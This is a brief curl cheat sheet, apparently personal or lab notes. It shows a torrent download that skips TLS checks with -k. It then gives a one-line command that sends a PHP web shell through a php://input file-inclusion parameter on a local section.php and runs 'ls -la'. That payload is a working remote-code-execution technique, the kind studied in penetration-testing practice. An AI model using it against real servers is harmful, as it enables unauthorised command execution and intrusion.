Skip to main content

Curl

Basic

curl -k -G https://releases.ubuntu.com/22.04/ubuntu-22.04.1-live-server-amd64.iso.torrent --output ubuntu.iso.torrent

-k --insecure
-G : GET request

to bypass ssl connection verification.

curl complex - TODO

complex put file with execution command:

curl -X PUT --data-binary $'<?php echo shell_exec($_GET[\'cmd\']);?>' -G 'http://127.0.0.1:8089/section.php' -d "page=php://input"  --data-urlencode "cmd=ls -la"